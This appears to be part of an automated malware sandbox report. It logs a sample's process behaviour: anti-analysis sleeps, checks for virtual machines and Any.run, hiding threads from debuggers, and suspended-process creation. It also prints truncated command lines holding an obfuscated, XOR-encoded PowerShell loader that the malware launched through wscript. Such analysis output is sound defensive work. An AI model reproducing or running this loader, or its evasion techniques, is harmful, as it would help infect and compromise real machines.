Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect Any.run
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5704 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5772 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe TID: 1244 Thread sleep count: 48 > 30 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe TID: 1244 Thread sleep time: -144000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Last function: Thread delayed
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3923 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe File Volume queried: C:\Windows\System32 FullSizeInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Program Files (x86)\Internet Explorer\ielowutil.exe Thread information set: HideFromDebugger Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$misjoinam = """ fsu noc tcipo nr ai nmcfls1 1 u{p b dppamrpaimm(p[asdtbr i n gm] `$aw afv esl )g; `$slfivn g vpif l=k ' 'b;r w r iptaef-lheoisbtu w`$fl ihnsg vfil;p wdrai tpeb-nh oss t u`$ l ikntg v ii;n cwcr i tke - hdo sut e`$sl ianhgsv i ;m k v s`$su nartesffu t r=u bnhebwl-oovbgj epcsts b yhtbea[ ] v(f`$bwia v eblr. lsernsgct hs u/m 2o)u; k s p vfno r (p`$sf obr e fcf efl =s0 ; c`$ufeo r emfbfaetli -ulst c`$ wfacv eol .cl einbgdtth ; s`$ffvo r eaf fae l +t= 2 ) { i s`$pkpo m maaangd o =r `$sw aiv eblt. scuabcsctsr i npg (i`$ f oprue f f e lb,s u2 ) ; a m n o a `$cu nsrfehfmustc[ `$ufsosrme fsfaeflf/d2 ] f=e [bceopnfvteor ta]f:a:atgorbryrtsee( `$bk ocmum acnodtoh, g1d6 )a;p `$slcabsct emnadlebs 1b6 0 =e a( `$su n r eifsu t [ `$rf oorheff f eoln/t2p]s -bbrxpoar i1 0u5v)r;v s `$lu nir etfwumtl[c`$ fio rcecfsfuealo/m2r]t = z`$rlta sut e nud e sg1 6o0 ;n p r s} s[ s t r i nugr]g[asuyfsptue m . tre x tf.ieenscbo dgi nagx] : :farspcaigi . gueztbs ttrdi nogm( `$ u n rserfau tm) ; } `$hm a tiejm a 0t=sitnacflt1e1 's3sa 1m0c1sa 1 d 0 ca0s4 4 7i0 dw0 5 0h5r'i; `$lmfa tpegmcah1 = i ndc lp1 1 s'h2 4j0e0m0 ap1eba0i6 1rau0h6s0 fu1fd 4a7 3 ef0s0 0e7s5ka 5 b 4w7l3 cd0 7 1ha 0n8d0af 0mcs2 7a0u8r1 d 0 0 1ufp0tcl2u4b0scd1adm0u1k0k6 0dds1pas'u;v`$smsa tce mpa 2w= i nacpls1a1s ' 2det0ncp1cdb3n9 1 b 0 6h0aat2 8 0jd 0cd 1tba0 cs1 as1 as'b;l`$mmbatt eamma 3h=mianmcsll1 1b 'e3baa1 0 1la 1sdg0lcl0 4r4 7d3 bb1ic 0 7 1 da0i0d0v4 0bc 4g7f2 0 0r7 1 da0 ct1ubb0t6i1p9 3kao0uc 1 br1ofw0i0d0sas0 cs1 a 4v7p2 1o0r8k0g7v0 da0s5c0tc 3 bp0ucf0nfb'e; `$im a teepm as4p= i nfcdl 1b1j 'u1mai1 d 1pbd0 0b0 7 0det'r;f`$umuasteedmrar5k=sicnmcfl 1w1u ' 2ae 0sci1nds2 4r0 6 0od 1scb0 5l0 cb2 1h0e8h0b7d0jd 0 5c0 c ' ;c`$pm actnenm a 6 = idnmcdls1u1 ' 3ob 3fd 3 a 1 9a0 cd0sav0s0a0c8u0n5 2s7u0c8v0v4 0ccs4t5 4f9d2 1i0 0c0ud 0ecd2sby1 0p3ma 0 0u0 ec4c5 4s9m3i9 1 c 0fb 0g5i0t0 0 a ' ; `$ mgast etmva 7 =si nncal 1h1c e'k3sb 1 ck0 7u1 d 0f0j0u4 0bc 4h5t4v9 2a4c0f8 0 7n0 8s0pe 0 ca0sdb'u;p`$fm atttetm am8n=hi n c l 1 1 ' 3ib 0 ce0vf 0 5l0sct0 a 1bd 0 ca0bdd2sdm0 cn0d5 0 c 0 ew0f8s1 de0sci's;a`$ m aftaetm ac9 =ki n c lt1 1h s'k2d0 0s7d2c4 0bc 0t4i0 6o1cbl1m0n2 4p0t6 0fdi1bc 0 5 0oc 's; `$ve h rsl 0 =rifnuc la1s1 ' 2n4 1 0o2pda0 c 0b5v0uct0sek0t8 1kd 0bc 3 d 1 0l1 9o0 cn' ; `$ eghorfld1u= isnmcsls1b1u ' 2aae0s5b0 8a1ia 1ua 4e5p4 9 3 9s1 cp0 bu0f5 0f0a0car4 5 4c9 3bad0ecm0g8t0 5o0cco0adi4u5 4f9 2m8 0k7h1eau0 0 2ja 0 5a0s8p1 ai1oa 4d5 4 9a2 8 1vcr1 dr0 6t2 a 0s5s0 8b1 ab1 at' ;c`$ efh rglw2k=fi n c lf1t1c f'd2b0 0s7s1kft0s6g0l2 0 c 'a; `$seahrr lt3m= ian cvlw1r1n 'h3 9 1bc 0sb 0a5 0l0b0sao4c5m4m9 2g1i0p0t0id 0wcf2 b 1 0s3mas0s0v0 ec4 5 4 9 2 7f0 cl1keh3jam0 5a0i6 1sd 4 5n4 9 3ofp0d0 1 b 1sd 1sc 0 8c0p5d'l;t`$ eshtrbl 4 =di n c l 1s1 'a3pfz0k0b1hb 1ad 1ucs0 8 0 5m2e8 0f5 0a5 0b6 0aab' ; `$pebhirbld5 = i npc l 1 1 u'f0d7 1gd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function incl11 { param([string]$wavel); $lingvi = ''; write-host $lingvi; write-host $lingvi; write-host $lingvi; $unrefut = new-object byte[] ($wavel.length / 2); for($foreffel=0; $foreffel -lt $wavel.length; $foreffel+=2){ $kommando = $wavel.substring($foreffel, 2); $unrefut[$foreffel/2] = [convert]::tobyte($kommando, 16); $lastendes160 = ($unrefut[$foreffel/2] -bxor 105); $unrefut[$foreffel/2] = $lastendes160; } [string][system.text.encoding]::ascii.getstring($unrefut);}$matema0=incl11 '3a101a1d0c04470d0505';$matema1=incl11 '24000a1b061a060f1d473e00075a5b473c071a080f0c27081d001f0c240c1d01060d1a';$matema2=incl11 '2e0c1d391b060a280d0d1b0c1a1a';$matema3=incl11 '3a101a1d0c04473b1c071d00040c4720071d0c1b06193a0c1b1f000a0c1a472108070d050c3b0c0f';$matema4=incl11 '1a1d1b00070e';$matema5=incl11 '2e0c1d24060d1c050c2108070d050c';$matema6=incl11 '3b3d3a190c0a0008052708040c454921000d0c2b103a000e4549391c0b05000a';$matema7=incl11 '3b1c071d00040c4549240807080e0c0d';$matema8=incl11 '3b0c0f050c0a1d0c0d2d0c050c0e081d0c';$matema9=incl11 '2007240c04061b1024060d1c050c';$ehrl0=incl11 '24102d0c050c0e081d0c3d10190c';$ehrl1=incl11 '2a05081a1a4549391c0b05000a45493a0c08050c0d454928071a002a05081a1a4549281c1d062a05081a1a';$ehrl2=incl11 '20071f06020c';$ehrl3=incl11 '391c0b05000a454921000d0c2b103a000e4549270c1e3a05061d45493f001b1d1c0805';$ehrl4=incl11 '3f001b1d1c0805280505060a';$ehrl5=incl11 '071d0d0505';$ehrl6=incl11 '271d391b061d0c0a1d3f001b1d1c0805240c04061b10';$ehrl7=incl11 '202c31';$ehrl8=incl11 '35';$soro=incl11 '3c3a2c3b5a5b';$imman=incl11 '2a0805053e00070d061e391b060a28';function fkp {param ($roman, $makaronie) ;$trothed0 =incl11 '4d2f0c1b0449544941322819192d06040800073453532a1c1b1b0c071d2d0604080007472e0c1d281a1a0c040b05000c1a41404915493e010c1b0c44260b030c0a1d4912494d36472e05060b0805281a1a0c040b05102a080a010c494428070d494d364725060a081d000607473a1905001d414d0c011b05514032445834472c181c08051a414d24081d0c04085940491440472e0c1d3d10190c414d24081d0c04085840';.($ehrl7) $trothed0;$trothed5 = incl11 '4d240005004954494d2f0c1b04472e0c1d240c1d01060d414d24081d0c04085b4549323d10190c3234344929414d24081d0c04085a45494d24081d0c04085d4040';.($ehrl7) $trothed5;$trothed1 = incl11 '1b0c1d1c1b07494d240005004720071f06020c414d071c050545492941323a101a1d0c04473b1c071d00040c4720071d0c1b06193a0c1b1f000a0c1a472108070d050c3b0c0f3441270c1e44260b030c0a1d493a101a1d0c04473b1c071d00040c4720071d0c1b06193a0c1b1f000a0c1a472108070d050c3b0c0f4141270c1e44260b030c0a1d4920071d391d1b404549414d2f0c1b04472e0c1d240c1d01060d414d24081d0c04085c40404720071f06020c414d071c0505454929414d3b060408074040404045494d240802081b0607000c4040';.($ehrl7) $trothed1;}function gdt {param ([parameter(position = 0, mandatory = $true)] [type[]] $ilderem,[parameter(position = 1)] [type] $glasslibe = [void]);$trothed2 = incl11 '4d2a060c05081a1d1b495449322819192d06040800073453532a1c1b1b0c071d2d060
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$misjoinam = """ fsu noc tcipo nr ai nmcfls1 1 u{p b dppamrpaimm(p[asdtbr i n gm] `$aw afv esl )g; `$slfivn g vpif l=k ' 'b;r w r iptaef-lheoisbtu w`$fl ihnsg vfil;p wdrai tpeb-nh oss t u`$ l ikntg v ii;n cwcr i tke - hdo sut e`$sl ianhgsv i ;m k v s`$su nartesffu t r=u bnhebwl-oovbgj epcsts b yhtbea[ ] v(f`$bwia v eblr. lsernsgct hs u/m 2o)u; k s p vfno r (p`$sf obr e fcf efl =s0 ; c`$ufeo r emfbfaetli -ulst c`$ wfacv eol .cl einbgdtth ; s`$ffvo r eaf fae l +t= 2 ) { i s`$pkpo m maaangd o =r `$sw aiv eblt. scuabcsctsr i npg (i`$ f oprue f f e lb,s u2 ) ; a m n o a `$cu nsrfehfmustc[ `$ufsosrme fsfaeflf/d2 ] f=e [bceopnfvteor ta]f:a:atgorbryrtsee( `$bk ocmum acnodtoh, g1d6 )a;p `$slcabsct emnadlebs 1b6 0 =e a( `$su n r eifsu t [ `$rf oorheff f eoln/t2p]s -bbrxpoar i1 0u5v)r;v s `$lu nir etfwumtl[c`$ fio rcecfsfuealo/m2r]t = z`$rlta sut e nud e sg1 6o0 ;n p r s} s[ s t r i nugr]g[asuyfsptue m . tre x tf.ieenscbo dgi nagx] : :farspcaigi . gueztbs ttrdi nogm( `$ u n rserfau tm) ; } `$hm a tiejm a 0t=sitnacflt1e1 's3sa 1m0c1sa 1 d 0 ca0s4 4 7i0 dw0 5 0h5r'i; `$lmfa tpegmcah1 = i ndc lp1 1 s'h2 4j0e0m0 ap1eba0i6 1rau0h6s0 fu1fd 4a7 3 ef0s0 0e7s5ka 5 b 4w7l3 cd0 7 1ha 0n8d0af 0mcs2 7a0u8r1 d 0 0 1ufp0tcl2u4b0scd1adm0u1k0k6 0dds1pas'u;v`$smsa tce mpa 2w= i nacpls1a1s ' 2det0ncp1cdb3n9 1 b 0 6h0aat2 8 0jd 0cd 1tba0 cs1 as1 as'b;l`$mmbatt eamma 3h=mianmcsll1 1b 'e3baa1 0 1la 1sdg0lcl0 4r4 7d3 bb1ic 0 7 1 da0i0d0v4 0bc 4g7f2 0 0r7 1 da0 ct1ubb0t6i1p9 3kao0uc 1 br1ofw0i0d0sas0 cs1 a 4v7p2 1o0r8k0g7v0 da0s5c0tc 3 bp0ucf0nfb'e; `$im a teepm as4p= i nfcdl 1b1j 'u1mai1 d 1pbd0 0b0 7 0det'r;f`$umuasteedmrar5k=sicnmcfl 1w1u ' 2ae 0sci1nds2 4r0 6 0od 1scb0 5l0 cb2 1h0e8h0b7d0jd 0 5c0 c ' ;c`$pm actnenm a 6 = idnmcdls1u1 ' 3ob 3fd 3 a 1 9a0 cd0sav0s0a0c8u0n5 2s7u0c8v0v4 0ccs4t5 4f9d2 1i0 0c0ud 0ecd2sby1 0p3ma 0 0u0 ec4c5 4s9m3i9 1 c 0fb 0g5i0t0 0 a ' ; `$ mgast etmva 7 =si nncal 1h1c e'k3sb 1 ck0 7u1 d 0f0j0u4 0bc 4h5t4v9 2a4c0f8 0 7n0 8s0pe 0 ca0sdb'u;p`$fm atttetm am8n=hi n c l 1 1 ' 3ib 0 ce0vf 0 5l0sct0 a 1bd 0 ca0bdd2sdm0 cn0d5 0 c 0 ew0f8s1 de0sci's;a`$ m aftaetm ac9 =ki n c lt1 1h s'k2d0 0s7d2c4 0bc 0t4i0 6o1cbl1m0n2 4p0t6 0fdi1bc 0 5 0oc 's; `$ve h rsl 0 =rifnuc la1s1 ' 2n4 1 0o2pda0 c 0b5v0uct0sek0t8 1kd 0bc 3 d 1 0l1 9o0 cn' ; `$ eghorfld1u= isnmcsls1b1u ' 2aae0s5b0 8a1ia 1ua 4e5p4 9 3 9s1 cp0 bu0f5 0f0a0car4 5 4c9 3bad0ecm0g8t0 5o0cco0adi4u5 4f9 2m8 0k7h1eau0 0 2ja 0 5a0s8p1 ai1oa 4d5 4 9a2 8 1vcr1 dr0 6t2 a 0s5s0 8b1 ab1 at' ;c`$ efh rglw2k=fi n c lf1t1c f'd2b0 0s7s1kft0s6g0l2 0 c 'a; `$seahrr lt3m= ian cvlw1r1n 'h3 9 1bc 0sb 0a5 0l0b0sao4c5m4m9 2g1i0p0t0id 0wcf2 b 1 0s3mas0s0v0 ec4 5 4 9 2 7f0 cl1keh3jam0 5a0i6 1sd 4 5n4 9 3ofp0d0 1 b 1sd 1sc 0 8c0p5d'l;t`$ eshtrbl 4 =di n c l 1s1 'a3pfz0k0b1hb 1ad 1ucs0 8 0 5m2e8 0f5 0a5 0b6 0aab' ; `$pebhirbld5 = i npc l 1 1 u'f0d7 1gd Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "function incl11 { param([string]$wavel); $lingvi = ''; write-host $lingvi; write-host $lingvi; write-host $lingvi; $unrefut = new-object byte[] ($wavel.length / 2); for($foreffel=0; $foreffel -lt $wavel.length; $foreffel+=2){ $kommando = $wavel.substring($foreffel, 2); $unrefut[$foreffel/2] = [convert]::tobyte($kommando, 16); $lastendes160 = ($unrefut[$foreffel/2] -bxor 105); $unrefut[$foreffel/2] = $lastendes160; } [string][system.text.encoding]::ascii.getstring($unrefut);}$matema0=incl11 '3a101a1d0c04470d0505';$matema1=incl11 '24000a1b061a060f1d473e00075a5b473c071a080f0c27081d001f0c240c1d01060d1a';$matema2=incl11 '2e0c1d391b060a280d0d1b0c1a1a';$matema3=incl11 '3a101a1d0c04473b1c071d00040c4720071d0c1b06193a0c1b1f000a0c1a472108070d050c3b0c0f';$matema4=incl11 '1a1d1b00070e';$matema5=incl11 '2e0c1d24060d1c050c2108070d050c';$matema6=incl11 '3b3d3a190c0a0008052708040c454921000d0c2b103a000e4549391c0b05000a';$matema7=incl11 '3b1c071d00040c4549240807080e0c0d';$matema8=incl11 '3b0c0f050c0a1d0c0d2d0c050c0e081d0c';$matema9=incl11 '2007240c04061b1024060d1c050c';$ehrl0=incl11 '24102d0c050c0e081d0c3d10190c';$ehrl1=incl11 '2a05081a1a4549391c0b05000a45493a0c08050c0d454928071a002a05081a1a4549281c1d062a05081a1a';$ehrl2=incl11 '20071f06020c';$ehrl3=incl11 '391c0b05000a454921000d0c2b103a000e4549270c1e3a05061d45493f001b1d1c0805';$ehrl4=incl11 '3f001b1d1c0805280505060a';$ehrl5=incl11 '071d0d0505';$ehrl6=incl11 '271d391b061d0c0a1d3f001b1d1c0805240c04061b10';$ehrl7=incl11 '202c31';$ehrl8=incl11 '35';$soro=incl11 '3c3a2c3b5a5b';$imman=incl11 '2a0805053e00070d061e391b060a28';function fkp {param ($roman, $makaronie) ;$trothed0 =incl11 '4d2f0c1b0449544941322819192d06040800073453532a1c1b1b0c071d2d0604080007472e0c1d281a1a0c040b05000c1a41404915493e010c1b0c44260b030c0a1d4912494d36472e05060b0805281a1a0c040b05102a080a010c494428070d494d364725060a081d000607473a1905001d414d0c011b05514032445834472c181c08051a414d24081d0c04085940491440472e0c1d3d10190c414d24081d0c04085840';.($ehrl7) $trothed0;$trothed5 = incl11 '4d240005004954494d2f0c1b04472e0c1d240c1d01060d414d24081d0c04085b4549323d10190c3234344929414d24081d0c04085a45494d24081d0c04085d4040';.($ehrl7) $trothed5;$trothed1 = incl11 '1b0c1d1c1b07494d240005004720071f06020c414d071c050545492941323a101a1d0c04473b1c071d00040c4720071d0c1b06193a0c1b1f000a0c1a472108070d050c3b0c0f3441270c1e44260b030c0a1d493a101a1d0c04473b1c071d00040c4720071d0c1b06193a0c1b1f000a0c1a472108070d050c3b0c0f4141270c1e44260b030c0a1d4920071d391d1b404549414d2f0c1b04472e0c1d240c1d01060d414d24081d0c04085c40404720071f06020c414d071c0505454929414d3b060408074040404045494d240802081b0607000c4040';.($ehrl7) $trothed1;}function gdt {param ([parameter(position = 0, mandatory = $true)] [type[]] $ilderem,[parameter(position = 1)] [type] $glasslibe = [void]);$trothed2 = incl11 '4d2a060c05081a1d1b495449322819192d06040800073453532a1c1b1b0c071d2d060 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe cmd /c dir&echo ###RSHELL.EXE### Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Misjoinam = """ FSu nOc tCiPo nR AI nMcFlS1 1 U{P B DpPaMrpaImM(P[aSdtBr i n gM] `$AW aFv eSl )G; `$SLFiVn g vPiF L=K ' 'B;R W r iPtAeF-LHeoIsbtU W`$FL iHnSg vFiL;P WdrAi tPeB-nH oss t U`$ L iKnTg v iI;N CWCr i tKe - HDo sUt E`$SL iAnHgSv i ;M K V S`$SU narTeSfFu t R=U BNHeBwL-oOVbgj ePcstS b yhtbeA[ ] V(f`$BWIa v eBlR. LseRnSgct hS U/M 2o)U; K S P VFno r (P`$SF oBr e fCf eFl =S0 ; C`$uFEo r emfBfAeTlI -Ulst C`$ WFaCv eOl .CL eInbgDtTh ; S`$FFVo r eAf fAe l +t= 2 ) { I S`$PKPo m mAaAnGd o =R `$SW aIv eBlt. SCuAbCsCtSr i nPg (I`$ F oprUe f f e lB,S U2 ) ; A M N O A `$CU nSrFeHfMuStC[ `$uFSoSrMe fSfAeFlF/D2 ] F=E [BcEoPnFvTeOr tA]F:A:ATGoRBRyRtSee( `$BK oCmUm acnOdToH, G1D6 )A;P `$SLCabsCt eMnAdLeBs 1b6 0 =E A( `$SU n r eIfSu t [ `$RF oOrHeFf f eOlN/T2p]S -BbRxPoAr I1 0U5V)R;V S `$LU nir etfWuMtL[C`$ FIo rCeCfSfUeAlO/M2R]t = Z`$RLTa sUt e nud e sg1 6O0 ;n P R S} S[ S t r i nUgR]G[ASUyFsPtUe m . TRe x tF.IEEnScBo dgi nAgX] : :FARSPCAIGI . GUeZtBS tTrDi nogM( `$ U n rSeRfAu tM) ; } `$HM a tIeJm a 0T=sITnAcFlT1E1 'S3SA 1M0C1SA 1 D 0 CA0S4 4 7I0 DW0 5 0H5R'I; `$LMFa tPeGmCaH1 = I nDc lP1 1 S'H2 4J0E0M0 AP1eBA0I6 1RAu0H6S0 FU1FD 4A7 3 EF0S0 0E7S5KA 5 B 4W7L3 Cd0 7 1HA 0N8d0AF 0MCS2 7A0U8R1 D 0 0 1UFP0TCL2U4B0SCD1ADM0U1K0K6 0DDS1PAS'u;v`$SMSa tCe mPa 2w= I nAcPlS1A1S ' 